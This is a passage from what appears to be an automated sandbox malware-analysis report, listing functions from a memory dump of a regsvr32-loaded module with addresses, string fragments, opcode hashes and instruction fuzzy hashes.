                                                      Function 0000000180026B98 Relevance: 2.7, Strings: 2, Instructions: 225COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: S9$qrd
                                                      • API String ID: 0-2332744662
                                                      • Opcode ID: dccb7ee8ec7dfb8e0809544b932b2caf2d93c57dd19aa3a9b169f23ded853006
                                                      • Instruction ID: d3a666ff84b181fad27f9c2352a1e83f1b6bb5c561d3220c9e7978bd2dadc88f
                                                      • Opcode Fuzzy Hash: dccb7ee8ec7dfb8e0809544b932b2caf2d93c57dd19aa3a9b169f23ded853006
                                                      • Instruction Fuzzy Hash: 6EB1357590660CCFCB69DFA4C08A6DDBBF1EF68344F104519E812AB262CBB0D919CB59
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180023C14 Relevance: 2.7, Strings: 2, Instructions: 204COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: hw}2$4&t
                                                      • API String ID: 0-1169878757
                                                      • Opcode ID: 858c4deae444743a57c26792a91effe053d1d8b489a12bfa541918911fc2fcd6
                                                      • Instruction ID: fd20564dcf1a671b287a6600624e9fb92dead2187b8d5629211a6de17e7e6b55
                                                      • Opcode Fuzzy Hash: 858c4deae444743a57c26792a91effe053d1d8b489a12bfa541918911fc2fcd6
                                                      • Instruction Fuzzy Hash: AEB168B590420CCFDB68CF78C45A5DD7BF1FB08308F60612AE826AA262D774D919CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001EBA0 Relevance: 2.7, Strings: 2, Instructions: 192COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: JMWd$a[
                                                      • API String ID: 0-3276560754
                                                      • Opcode ID: 94f2740beabb4555a63fe109c076897c128458c56f4cbcfe5625600f94c775f6
                                                      • Instruction ID: 3b54873520b9a846c0abc3e4022efff23af49e59c185cad729b6d512d224c3a2
                                                      • Opcode Fuzzy Hash: 94f2740beabb4555a63fe109c076897c128458c56f4cbcfe5625600f94c775f6
                                                      • Instruction Fuzzy Hash: D5A106706047889FDBBACF18CC857DE3BA8FB46748F504229E8CA8E254CB745749CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180015494 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %[$-
                                                      • API String ID: 0-2535708364
                                                      • Opcode ID: 65f60e6b5a076c6be367ab0f8efb072c07a091d19f07b8aff3e0ecb4ccd985c8
                                                      • Instruction ID: a7604732bdc10a899b7b050bfde45695c0722dd065d5eed74db0117fa162c574
                                                      • Opcode Fuzzy Hash: 65f60e6b5a076c6be367ab0f8efb072c07a091d19f07b8aff3e0ecb4ccd985c8
                                                      • Instruction Fuzzy Hash: 1F81627050074ECBDB99DF14C88A7DE3BA0FB28389F114219FC85962A0D778C699CBC4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000DB4C Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: /Mr$i:O:
                                                      • API String ID: 0-3426536595
                                                      • Opcode ID: 8fba9de9c6c3b1e5047e1d7641fef574ac2ea6f46defdcfa8fbb4029ea408963
                                                      • Instruction ID: 3eba081f804be6fa3a9d4fb4db8c82f5607d3411af965209965460f3089a80c7
                                                      • Opcode Fuzzy Hash: 8fba9de9c6c3b1e5047e1d7641fef574ac2ea6f46defdcfa8fbb4029ea408963
                                                      • Instruction Fuzzy Hash: 7C91087050438C8FDBBADF24C8AA7DE7BA1FB5A304F50461EEA4E8E250DB749644CB41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180017E2C Relevance: 2.7, Strings: 2, Instructions: 163COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 6|4$;|-
                                                      • API String ID: 0-2897245347
                                                      • Opcode ID: 35605434c5429477d06d2e5b9b1bfa34856c77736f87f3e727847c01dfef7208
                                                      • Instruction ID: 839a7c11e172a9a14e1c367a044feafa9aab422ef7ede3a919e78660e0b6ca0a
                                                      • Opcode Fuzzy Hash: 35605434c5429477d06d2e5b9b1bfa34856c77736f87f3e727847c01dfef7208
                                                      • Instruction Fuzzy Hash: C0714B7090474D8FCF88DFA4C8866EEBBF0FB48308F114619E88AA7251D7789645CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000F328 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: U$U#
                                                      • API String ID: 0-861755185
                                                      • Opcode ID: 2086c1731bcfc2cec1958e1d1a3f8cb927817e2dd584414818c7a6dfab91bab1
                                                      • Instruction ID: 3d07f47d2f6b9c27b0e4fe7d5859b29f381f1ada24735b7dc646a2f801c86eef
                                                      • Opcode Fuzzy Hash: 2086c1731bcfc2cec1958e1d1a3f8cb927817e2dd584414818c7a6dfab91bab1
                                                      • Instruction Fuzzy Hash: 0C515C7150C7449FC7A8DF18D4C67AAB7E0FB88310F90991DF8CAC7251EB70A9598B82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180007EB4 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: fK$Pr
                                                      • API String ID: 0-2696692655
                                                      • Opcode ID: 9489b844c734f0d344b598ec7bcb8736a735df1c6bae6eaa62d1b735c6b442f4
                                                      • Instruction ID: dfe3628fe45c31a405763d5fff7ed8f4d77ec04c4bb6b45016b3f1679df2575b
                                                      • Opcode Fuzzy Hash: 9489b844c734f0d344b598ec7bcb8736a735df1c6bae6eaa62d1b735c6b442f4
                                                      • Instruction Fuzzy Hash: 907116B090474E8FDB88CF28C88A6DE7BF0FB18358F515219FC4AA6260D774D598CB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000DEF4 Relevance: 2.6, Strings: 2, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: n\$z+&
                                                      • API String ID: 0-1414119057
                                                      • Opcode ID: f24be46eeb560fbb290949dbfd7d05873455e782ddfe7ec7ed40b48d6508653b
                                                      • Instruction ID: eeb2c5940d29436bcd670e7d8a2b521530b450e3042878bcb8e4954d48490cde
                                                      • Opcode Fuzzy Hash: f24be46eeb560fbb290949dbfd7d05873455e782ddfe7ec7ed40b48d6508653b
                                                      • Instruction Fuzzy Hash: 22612070A04B0C8BCBA9DF98D48AADDB7F1FB58344F00411DE846A7390DBB8950ACB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800015C0 Relevance: 2.6, Strings: 2, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .$50
                                                      • API String ID: 0-2436285167
                                                      • Opcode ID: 84d2de074a5e6e1a5d921b58512406c284d81fdc35452f42d6b6a069db9f8ad4
                                                      • Instruction ID: 63debb9af518b5fca5d59737c01840b12b974a655eea7ff458552c4fa6b671e5
                                                      • Opcode Fuzzy Hash: 84d2de074a5e6e1a5d921b58512406c284d81fdc35452f42d6b6a069db9f8ad4
                                                      • Instruction Fuzzy Hash: 3671DF705087848FD769CF28C58965ABBF0FBC6344F008A1DF68686260CBB6D949CF03
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180002ADC Relevance: 2.6, Strings: 2, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ,{$uC
                                                      • API String ID: 0-1099860252
                                                      • Opcode ID: 2af00e218d12abdb99ef7e76f2ba815a0f7da0c0d962cc97f106519d062cd6fe
                                                      • Instruction ID: df29777c25f03bc51b29c5e68a382a2b48421fa47568a9dd7f4acde699563025
                                                      • Opcode Fuzzy Hash: 2af00e218d12abdb99ef7e76f2ba815a0f7da0c0d962cc97f106519d062cd6fe
                                                      • Instruction Fuzzy Hash: 28612D71A04B0C8FDBA9DF98D08A7DEB7F1FB48344F004119E406E7291DBB8990ADB85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180004E3C Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: "C$*6TO
                                                      • API String ID: 0-2251823003
                                                      • Opcode ID: 11a52743e991166c772ae58171141d3b918ce8d4020b5bd660e65aa41626bcf5
                                                      • Instruction ID: 1108d3b1afe4df31317b10417d35e55e698c36e02fd161062712c06e930ceb12
                                                      • Opcode Fuzzy Hash: 11a52743e991166c772ae58171141d3b918ce8d4020b5bd660e65aa41626bcf5
                                                      • Instruction Fuzzy Hash: 598166B550130DCFCB98DF28C58A59D3BA8FB49308F40812AFC1E9A264D3B4E659DB46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180015264 Relevance: 2.6, Strings: 2, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: _ N$nkz
                                                      • API String ID: 0-4083044659
                                                      • Opcode ID: a2e505ed0ed44acca9d37efa5475ae9917bfda84fefcb3a28f95bfb4043916ce
                                                      • Instruction ID: b07831c94fe2cbd7ac58294498593f0ee6961182af88fd212fccb4805bec53d6
                                                      • Opcode Fuzzy Hash: a2e505ed0ed44acca9d37efa5475ae9917bfda84fefcb3a28f95bfb4043916ce
                                                      • Instruction Fuzzy Hash: 39513971D04A1D8BDF99CFA8C5457EEBBB1FB48344F108119E415BB250CBB89A09CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018000B834 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LiD+$?
                                                      • API String ID: 0-3739020763
                                                      • Opcode ID: bc963e11fa834f262c09c021a462739b615030ee8f9d2598156052fa386473db
                                                      • Instruction ID: 2f7d624153028320349e4a0adb7356b45dc1f3746b227896fac10cb383cb0630
                                                      • Opcode Fuzzy Hash: bc963e11fa834f262c09c021a462739b615030ee8f9d2598156052fa386473db
                                                      • Instruction Fuzzy Hash: F35191B590034E8FCB48DF64D48A8DE7FB0FB68398F214619E815A7210D7B496A4CFD5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800085BC Relevance: 2.6, Strings: 2, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %&Iv$\o
                                                      • API String ID: 0-2950252169
                                                      • Opcode ID: e3b847a27b1fdf8219116b43965b4243214bd6bbc489cbb0191219741f6e6deb
                                                      • Instruction ID: 7d8516b09fccf329ce1ee45da69bc8f76dfc96f1b67d05b04ebb17f55f6537e3
                                                      • Opcode Fuzzy Hash: e3b847a27b1fdf8219116b43965b4243214bd6bbc489cbb0191219741f6e6deb
                                                      • Instruction Fuzzy Hash: 7041C2B090074E8FCB48DF28C88A4DE7FB1FB68398F514619EC56A7250D7B496A4CBC4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180009408 Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: |<$P;
                                                      • API String ID: 0-71676942
                                                      • Opcode ID: d8b30cb9b0bbde5f967eaf6e88493efae150f481542faaeeec2b89fd53c9bf9b
                                                      • Instruction ID: b926ab4478da67f81816527f76e4a4189747c2b1a61b322854fb240660ec53f5
                                                      • Opcode Fuzzy Hash: d8b30cb9b0bbde5f967eaf6e88493efae150f481542faaeeec2b89fd53c9bf9b
                                                      • Instruction Fuzzy Hash: 0F41F4B190078ECFCF48DF68C88A5DE7BB0FB58318F10461DE82AA6250D3B49665CF84
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001A524 Relevance: 2.6, Strings: 2, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #X$< @
                                                      • API String ID: 0-1734357072
                                                      • Opcode ID: efe0763d8a7a245e8cb996b606fb90cb3ba626e454cc1a7dd4141ea463f73824
                                                      • Instruction ID: 53d5526a666e2e4b0aa3df313d94281727ef5dde582db7952040e92a2ea044da
                                                      • Opcode Fuzzy Hash: efe0763d8a7a245e8cb996b606fb90cb3ba626e454cc1a7dd4141ea463f73824
                                                      • Instruction Fuzzy Hash: E241C3B090078E8FCF48DF68C95A5DE7BB0FB58348F104A1DEC6AA6250D3B49665CF94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800234D8 Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .B$X&x
                                                      • API String ID: 0-2125001607
                                                      • Opcode ID: b56e4be042cf3e20bfd4171d949980e8bdde88a4c8b77932d249eea416ff403a
                                                      • Instruction ID: 406be0e8b3d674fc45ad7aec45ce8f3a41fae9dcbe4fb503a73b8d88e4a7390b
                                                      • Opcode Fuzzy Hash: b56e4be042cf3e20bfd4171d949980e8bdde88a4c8b77932d249eea416ff403a
                                                      • Instruction Fuzzy Hash: F541C3B190034E8BDF48DF68C98A4DE7BB1FB58358F00461DE866AB350D3B89665CF85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180014F50 Relevance: 2.6, Strings: 2, Instructions: 80COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: D-o$S1
                                                      • API String ID: 0-2248371139
                                                      • Opcode ID: b2af9136cfd81d84eb1aedf16953768fff15e9d6dc77d4de408be5ef0b131a39
                                                      • Instruction ID: c824313cc5550ea8d08e24e936909b38c1116e4b52b8e35a6cfdfb4e8fb0d5b5
                                                      • Opcode Fuzzy Hash: b2af9136cfd81d84eb1aedf16953768fff15e9d6dc77d4de408be5ef0b131a39
                                                      • Instruction Fuzzy Hash: 7F418F7090074E8FCF88CF68C48A5DEBFB0FB28398F144619E856A6250D3B496A5CFC5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180021588 Relevance: 2.6, Strings: 2, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ")v$kNTY
                                                      • API String ID: 0-925696221
                                                      • Opcode ID: 2d468f080be7dc4ac37fbc5ab55ab08a385f91380d02a95960c4866fb202e0cd
                                                      • Instruction ID: 3d1cde25fc61112586e0ccbc864a2b9889115514f3b9559dcc74a8c2fbc402f5
                                                      • Opcode Fuzzy Hash: 2d468f080be7dc4ac37fbc5ab55ab08a385f91380d02a95960c4866fb202e0cd
                                                      • Instruction Fuzzy Hash: 49317CB16187858B8348DF28C45641ABBE1FBCD70CF544B2DF4CAAB251D738D6128B4B
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800025B8 Relevance: 2.6, Strings: 2, Instructions: 69COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: O$\u
                                                      • API String ID: 0-3775190597
                                                      • Opcode ID: 81226de3c00d9588fcdb855554b2562b3d5d50c3db8a2dd8ff0fab91db437570
                                                      • Instruction ID: b3d17dff366e7d439aca65bd494037a1e9e1cb33d0f26cc5f3c7e2fad645fe6e
                                                      • Opcode Fuzzy Hash: 81226de3c00d9588fcdb855554b2562b3d5d50c3db8a2dd8ff0fab91db437570
                                                      • Instruction Fuzzy Hash: 5B31C4B0528781AFC798DF28D09991ABBF1FBC9304F806A1DF98A8B350D774D845CB42
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180012044 Relevance: 2.6, Strings: 2, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: +N$:s[
                                                      • API String ID: 0-2992701377
                                                      • Opcode ID: 59945e4bfd5c1812b410bc992af75b99beb9f24da50121ece688e224e72b4b08
                                                      • Instruction ID: 2af45dfac4c7ae0da7497fa8c295952f08e7f96bebb69c710dc1a077a3b8364b
                                                      • Opcode Fuzzy Hash: 59945e4bfd5c1812b410bc992af75b99beb9f24da50121ece688e224e72b4b08
                                                      • Instruction Fuzzy Hash: 443192B5528381ABC388DF28C48A81FBBE1FBC9359F806A1DF8C696261D734D5458B43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180024370 Relevance: 2.6, Strings: 2, Instructions: 64COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 'yN$k
                                                      • API String ID: 0-35230329
                                                      • Opcode ID: 664b9cbffe37651652d085acf9af43cce7b6a19192dfc0ee1d7ff8525738b321
                                                      • Instruction ID: 07b651401a32326000ca6cd35722393aebb0696fbf8e2d5e5a89f081ef8d3ba1
                                                      • Opcode Fuzzy Hash: 664b9cbffe37651652d085acf9af43cce7b6a19192dfc0ee1d7ff8525738b321
                                                      • Instruction Fuzzy Hash: DE318FB191478E8BDB48DF68D8494DF3BF0FB58308F004A29EC6A9A250D7B49664CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00000001800024C0 Relevance: 2.6, Strings: 2, Instructions: 51COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ]2F$lt
                                                      • API String ID: 0-3307743551
                                                      • Opcode ID: e35954fd64214c4dc75024e05a92e9afc61a62ba820b5d5e41e037a5dcd882da
                                                      • Instruction ID: b2e8e3d622355c2c7a8d87ad16832996e77f732c72c2020fcd3ed114b96953d1
                                                      • Opcode Fuzzy Hash: e35954fd64214c4dc75024e05a92e9afc61a62ba820b5d5e41e037a5dcd882da
                                                      • Instruction Fuzzy Hash: BC218C70528385ABC798CF24C1CA94BBBE1FBD4758F906A0DF8828B264D774D909CB43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001667C Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: t2i.
                                                      • API String ID: 0-2317288456
                                                      • Opcode ID: ddf1efb97a931d6c5f3ee8c67c3fa2b44aa9af6db9e4e5e1b98fbf81237c32be
                                                      • Instruction ID: 45fd1b4f7d9ae1bb3a1595fd0447dfa3858b4c22850e921c91e36994c5fa5290
                                                      • Opcode Fuzzy Hash: ddf1efb97a931d6c5f3ee8c67c3fa2b44aa9af6db9e4e5e1b98fbf81237c32be
                                                      • Instruction Fuzzy Hash: F4C17C709197489BD7D6DF18C48579EBBE0FB88344F906A1EF486C72A0CB34DA49CB02
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 000000018001AEC8 Relevance: 1.5, Strings: 1, Instructions: 261COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !
                                                      • API String ID: 0-133318149
                                                      • Opcode ID: 9a28524a62feba04ad602aea3c6b43a9e37f0bb3cb72c69032c5b680e6eaa856
                                                      • Instruction ID: 4d490125f0736c0523a0bc8c54046deb818a488a36854fcf26dc18eb231edbc7
                                                      • Opcode Fuzzy Hash: 9a28524a62feba04ad602aea3c6b43a9e37f0bb3cb72c69032c5b680e6eaa856
                                                      • Instruction Fuzzy Hash: 94C1277090474D8BDF48DF68C88A6EE7BF1FB48358F15821DE84AA7250C7789949CF85
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180001980 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GP
                                                      • API String ID: 0-809347306
                                                      • Opcode ID: c18687982be6c1a2fdabfac97a268a3404b4fe9754ccd0dba6adaab26aa3d97e
                                                      • Instruction ID: b8cc07b6ee5f07dffcf88ae53723e0b0b514af2364763fc1c4f878c703b2f424
                                                      • Opcode Fuzzy Hash: c18687982be6c1a2fdabfac97a268a3404b4fe9754ccd0dba6adaab26aa3d97e
                                                      • Instruction Fuzzy Hash: 35C18BB190060DCFCF68CF78D55A59D7BF1BB48308F606229F826AA2A2D3B49915CF54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0000000180014484 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: G
                                                      • API String ID: 0-4067352199
                                                      • Opcode ID: 571051391216adea76df2afa30ecc8bad161d89b390d9c97388838629c1a5ca4
                                                      • Instruction ID: 225e36911d9d240547ab15c987b60d96220a9315f181ed6db9e7231e26a901aa
                                                      • Opcode Fuzzy Hash: 571051391216adea76df2afa30ecc8bad161d89b390d9c97388838629c1a5ca4
